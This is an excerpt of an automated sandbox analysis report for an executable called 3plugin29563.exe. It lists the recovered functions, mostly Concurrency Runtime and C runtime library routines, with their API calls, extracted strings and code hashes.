Part of subcall function 02135EBF: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 02135F85

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 02137B89
Concurrency::location::_Assign.LIBCMT ref: 02137BAA
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 02137BB2
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02137BC4
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 02137BF4

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 50f2e429524607a77538fd023951b65e75c5d72046e94d694baf6ea26f28a98b
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 86310470B80256AFCF27AA7888917FEFBBB5F45704F0400A9C851D72C4DB25494BCB91

Function 00430925 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043093B
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425C4E,?), ref: 0043094D
GetCurrentThread.KERNEL32 ref: 00430955
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425C4E,?), ref: 0043095D
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425C4E,?), ref: 00430976
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00430997

Part of subcall function 004201B1: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004201CB

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425C4E,?), ref: 004309A9
GetLastError.KERNEL32(?,?,?,?,?,00425C4E,?), ref: 004309D4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004309EA

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 4a37a2409866743f2febd61ffa374258c3d3713468b6766a7e2dd0bdbf4a3453
Instruction ID: ea2d67e05215490eae4a913c2035f6bbbbaa4a2066a87e48ed43ce4d7d3c4a4b
Opcode Fuzzy Hash: 4a37a2409866743f2febd61ffa374258c3d3713468b6766a7e2dd0bdbf4a3453
Instruction Fuzzy Hash: 7711D2B5640301ABEB10AB75AD5AB9B3BA89F09701F180176FD45E6253EA78C900C77E

Function 02140B8C Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02140BA2
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02135EB5,?), ref: 02140BB4
GetCurrentThread.KERNEL32 ref: 02140BBC
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02135EB5,?), ref: 02140BC4
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,02135EB5,?), ref: 02140BDD
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 02140BFE

Part of subcall function 02130418: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02130432

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,02135EB5,?), ref: 02140C10
GetLastError.KERNEL32(?,?,?,?,?,02135EB5,?), ref: 02140C3B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02140C51

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 4a37a2409866743f2febd61ffa374258c3d3713468b6766a7e2dd0bdbf4a3453
Instruction ID: 400d67df52be68f6518162b08167ef4ef2d545a478f712889b790fbee5441bb2
Opcode Fuzzy Hash: 4a37a2409866743f2febd61ffa374258c3d3713468b6766a7e2dd0bdbf4a3453
Instruction Fuzzy Hash: 22112475680308EFCB14BB759D49F9A3BA8AF09701F0800B5FE49DA152EF74C6048B75

Function 021526AE Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02152730
_free.LIBCMT ref: 02152754
_free.LIBCMT ref: 021528E1
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021528F3
_free.LIBCMT ref: 02152AAD

Strings

XgE, xrefs: 0215289C, 021528A2
XgE, xrefs: 02152A10

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE$XgE
API String ID: 597776487-1765908331
Opcode ID: 8228ff0cba050116092ccc0bd45159c27ecdf62f726296749907114807962759
Instruction ID: b5f871c8ac1b9e77daaa45da4e09568bedb34403866a5cc51ed3f8c0d4ba9452
Opcode Fuzzy Hash: 8228ff0cba050116092ccc0bd45159c27ecdf62f726296749907114807962759
Instruction Fuzzy Hash: 1AC15977980225EFDB24EF68CC50BAA7BEAEF45314F1401E9DCA497290E7749941CB90

Function 02115D87 Relevance: 12.4, APIs: 8, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa41b3d853af93cc8b5324471e491cd074f5bddc2506b3bf91e25db8c5ef262
Instruction ID: ad6db099d8db85f2fe88af995ea77017db85563155e1040bc8f173833a0fe54b
Opcode Fuzzy Hash: 5fa41b3d853af93cc8b5324471e491cd074f5bddc2506b3bf91e25db8c5ef262
Instruction Fuzzy Hash: D6F1037094025CAFEB24CF54CC84BDEBBBAEF44304F5042A9E508A72C1DB759A98CF95

Function 0041EDFF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041EE5C
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EE68
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EE81
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EEAF
Concurrency::Context::Block.LIBCONCRT ref: 0041EED1

Strings

A, xrefs: 0041EE70

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: A
API String ID: 1182035702-3684490460
Opcode ID: 6fc47b2fad7041e8737b7033859bcf88e87cfd797c7cdb07b4920cce283e2b2d
Instruction ID: 9b1aaf3e5eb8c0abce8b0dfc0251bc412505656ceabe20f51040bcabad5d36c0
Opcode Fuzzy Hash: 6fc47b2fad7041e8737b7033859bcf88e87cfd797c7cdb07b4920cce283e2b2d
Instruction Fuzzy Hash: 71216074C0031ACADF24DFA6C4456EEB7F0BF14314F20052FE865A6291E7799AC5CB59

Function 0043E9BE Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0043E9E8
_free.LIBCMT ref: 0043EAC1
_free.LIBCMT ref: 0043EAEE

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 1eab701978da1ff23a9127c0a65203f59021f32d54883409cc10a32f256a0fbc
Instruction ID: 06afcfd1c582bfe624e0dbbeff077fdcc99dfcf8c6a83b3b8f040a8f85707c39
Opcode Fuzzy Hash: 1eab701978da1ff23a9127c0a65203f59021f32d54883409cc10a32f256a0fbc
Instruction Fuzzy Hash: 02515970909205AFDB21EF67D841A6EBBA4EF0D314F10606FF511972C1EA7DA901CB5D

Function 0214EC25 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0214EC4F
_free.LIBCMT ref: 0214ED28
_free.LIBCMT ref: 0214ED55

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 964050cfe98b64ad5f12aef5ac0cd2ae03c2c3a42526229d66b7e1ab66c6f8a8
Instruction ID: 172347a102be5281b813cf12adccf263b7bb7780ea9399890ee4f2faf6474ab4
Opcode Fuzzy Hash: 964050cfe98b64ad5f12aef5ac0cd2ae03c2c3a42526229d66b7e1ab66c6f8a8
Instruction Fuzzy Hash: 625104B19C4255AFDF20AFB4D840A6D7BA5BF01314F15426EE92CA7280EF728641CF51

Function 004347E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00434817
___except_validate_context_record.LIBVCRUNTIME ref: 0043481F
_ValidateLocalCookies.LIBCMT ref: 004348A8
__IsNonwritableInCurrentImage.LIBCMT ref: 004348D3
_ValidateLocalCookies.LIBCMT ref: 00434928

Strings

csm, xrefs: 004348BD

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6d031ba505c9ec8e722e9c4453558d7d4a8e6396e40e733c41e229fa6cb4f40d
Instruction ID: 551be3216cefd7dd097f7e0cef18fa31428cdd1af678a7a778540666fbc215f8
Opcode Fuzzy Hash: 6d031ba505c9ec8e722e9c4453558d7d4a8e6396e40e733c41e229fa6cb4f40d
Instruction Fuzzy Hash: 4341EB38D00244AFCF14EF69C844ADE7BB5EF89328F14905BE9145B392D779E901CB95

Function 00431AC6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431ADF

Part of subcall function 00431DAE: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00431827), ref: 00431DBE

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431AF4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431B03
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431BC7

Strings

pContext, xrefs: 00431BBF
switchState, xrefs: 00431AFB

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: f8db278b2be702a89df8ee59d0553bbb71f604d75d9491b350bbaf38b79f034c
Instruction ID: bc55309d5240b1e4e63b6ffadbdd078c74336ca823f07fb1c6b704056d71cf64
Opcode Fuzzy Hash: f8db278b2be702a89df8ee59d0553bbb71f604d75d9491b350bbaf38b79f034c
Instruction Fuzzy Hash: 6F31A935A00214ABCF04EF65C881E6E7375BF4C325F20456BE91597361DB78EE05C798

Function 0042E74F Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E777

Part of subcall function 0042E4E4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E517
Part of subcall function 0042E4E4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E539

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E7F4
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E800
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E80F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E819
Concurrency::location::_Assign.LIBCMT ref: 0042E84D
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E855

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: e82e8883490ce4a26c3de05762ad6604feec17dd3642b743c113e4f0b087f588
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 93414B39B002149FCF01EF65D884AADB7B5FF48314F5484AAED499B382DB34A941CB95

Function 0213E9B6 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0213E9DE

Part of subcall function 0213E74B: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0213E77E
Part of subcall function 0213E74B: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0213E7A0

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0213EA5B
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0213EA67
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0213EA76
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0213EA80
Concurrency::location::_Assign.LIBCMT ref: 0213EAB4
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0213EABC

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: e2f47e3a83b36930665d05cc50b261bc2790b714267246aed83b389885948278
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 3D411C79A40218AFCF05EF64C494BADB7B6FF48310F1480A9DD499B381DB34A941CF91

Function 0043DF13 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

fC, xrefs: 0043DF64
C:\Users\user\Desktop\3plugin29563.exe, xrefs: 0043DF18

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\3plugin29563.exe$fC
API String ID: 0-914834374
Opcode ID: c68f7f1079cf706450309b4984f83df9652144e8ecdb17989ade17cf00db1c92
Instruction ID: 5593eb698c274b81e8fcb42b10f11fbd0ea4849ff7c81376a4257acd3a615514
Opcode Fuzzy Hash: c68f7f1079cf706450309b4984f83df9652144e8ecdb17989ade17cf00db1c92
Instruction Fuzzy Hash: 7021A771A042097FDB207F62ACC0D6B775DEF18368F10551AF56A97290E738EC408BA9

Function 0043B0AD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0043B104
ext-ms-, xrefs: 0043B118

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
Instruction ID: f4627dbef7227ae1a34b09014eccd2050b3d4c7f0110b70102beb7be56de49fd
Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
Instruction Fuzzy Hash: D621EB76A01324ABCF218B649C55B1B3758DB097E1F201123FE59A7391E778ED008AED

Function 0212F066 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0212F06D
_SpinWait.LIBCONCRT ref: 0212F0C3
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0212F0CF
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0212F0E8
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0212F116
Concurrency::Context::Block.LIBCONCRT ref: 0212F138

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1888882079-0
Opcode ID: 6fc47b2fad7041e8737b7033859bcf88e87cfd797c7cdb07b4920cce283e2b2d
Instruction ID: 5200751f9f6dae812e97a561a8e46e70a369ae7aaf8e15bd7852b8539b059e71
Opcode Fuzzy Hash: 6fc47b2fad7041e8737b7033859bcf88e87cfd797c7cdb07b4920cce283e2b2d
Instruction Fuzzy Hash: 69219F70880239CEDF28DFA4C8546EEB7F1EF14314F50052AF061A6690EB718A6ACF54

Function 0043F00B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043EFD3: _free.LIBCMT ref: 0043EFF8

_free.LIBCMT ref: 0043F059

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 0043F064
_free.LIBCMT ref: 0043F06F
_free.LIBCMT ref: 0043F0C3
_free.LIBCMT ref: 0043F0CE
_free.LIBCMT ref: 0043F0D9
_free.LIBCMT ref: 0043F0E4

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: 78d0b1938977f71069cc23e2c37866ead1521153a9ba0543e6508fc736a07f46
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: E411AF31542B08BAE520B7B2CC07FCBBBDD9F0C309F40582EB399A60D6DAACF5148645

Function 0214F272 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0214F23A: _free.LIBCMT ref: 0214F25F

_free.LIBCMT ref: 0214F2C0

Part of subcall function 0214AF8C: HeapFree.KERNEL32(00000000,00000000,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?), ref: 0214AFA2
Part of subcall function 0214AF8C: GetLastError.KERNEL32(?,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?,?), ref: 0214AFB4

_free.LIBCMT ref: 0214F2CB
_free.LIBCMT ref: 0214F2D6
_free.LIBCMT ref: 0214F32A
_free.LIBCMT ref: 0214F335
_free.LIBCMT ref: 0214F340
_free.LIBCMT ref: 0214F34B

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: 8189edd85eb0aa8e4944b6dc507bd159c6932b8e6515464fb0a4ea08ba2fcac8
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: 30117FB65C4B04BED520B7B0CC05FCB7B9EAF08704F404929AA9D66651DF78F50B8E91

Function 0212FC78 Relevance: 10.6, APIs: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,02133DED), ref: 0212FC86
GetProcAddress.KERNEL32(00000000,0045177C), ref: 0212FC94
GetProcAddress.KERNEL32(00000000,00451794), ref: 0212FCA2
GetProcAddress.KERNEL32(00000000,004517AC), ref: 0212FCD0
GetLastError.KERNEL32(?,?,?,02133DED), ref: 0212FCEB
GetLastError.KERNEL32(?,?,?,02133DED), ref: 0212FCF7
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0212FD0D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID:
API String ID: 1654681794-0
Opcode ID: 3ae5e1761c5e68bf1df0cae86709e1bcb1c39423b3646c192bb872ab5e16c95f
Instruction ID: e9241d9e174c42892feb630b604d5480cc927a18206c34b183c024ab6ab92aa1
Opcode Fuzzy Hash: 3ae5e1761c5e68bf1df0cae86709e1bcb1c39423b3646c192bb872ab5e16c95f
Instruction Fuzzy Hash: BA01A5355803156BD7013BB57C88F6B36BDEA04756B24053AF801D2192EB79D4088B69

Function 00416DA0 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 0041C64C: mtx_do_lock.LIBCPMT ref: 0041C654

__Mtx_unlock.LIBCPMT ref: 00416E71
std::_Rethrow_future_exception.LIBCPMT ref: 00416EC2
std::_Rethrow_future_exception.LIBCPMT ref: 00416ED2
__Mtx_unlock.LIBCPMT ref: 00416F75
__Mtx_unlock.LIBCPMT ref: 0041707B
__Mtx_unlock.LIBCPMT ref: 004170B6

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: 763d5298e9f7ced9031ea8b98b7ccaab74531810db3555064094cc7fe1fa59db
Instruction ID: b89211b9a385ef8ffcd19824d4eb8fd711da128c6817db8e8ee40b02d6fbb09c
Opcode Fuzzy Hash: 763d5298e9f7ced9031ea8b98b7ccaab74531810db3555064094cc7fe1fa59db
Instruction Fuzzy Hash: 8CC1C071D043049BDB24DFA5C985BEBBBF4AF05304F00456FE81697781EB39A984CB99

Function 02127007 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 021270D8
std::_Rethrow_future_exception.LIBCPMT ref: 02127129
std::_Rethrow_future_exception.LIBCPMT ref: 02127139
__Mtx_unlock.LIBCPMT ref: 021271DC
__Mtx_unlock.LIBCPMT ref: 021272E2
__Mtx_unlock.LIBCPMT ref: 0212731D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 9b77889f6880c4c60810f88e4fee8b63d846359222b2684369689af48488a7b1
Instruction ID: f693e28ee41c6abe0b7ff197d621586f6d3d0eacbe816554035ab197111cba15
Opcode Fuzzy Hash: 9b77889f6880c4c60810f88e4fee8b63d846359222b2684369689af48488a7b1
Instruction Fuzzy Hash: 44C1DD709802249FDB25DFA4C944BAFFBF5AF05304F00856EF91697680EB35A91DCBA1

Function 0043FBEF Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00408610,00000000), ref: 0043FC37
__fassign.LIBCMT ref: 0043FE16
__fassign.LIBCMT ref: 0043FE33
WriteFile.KERNEL32(?,00408610,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FE7B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0043FEBB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FF67

Memory Dump Source

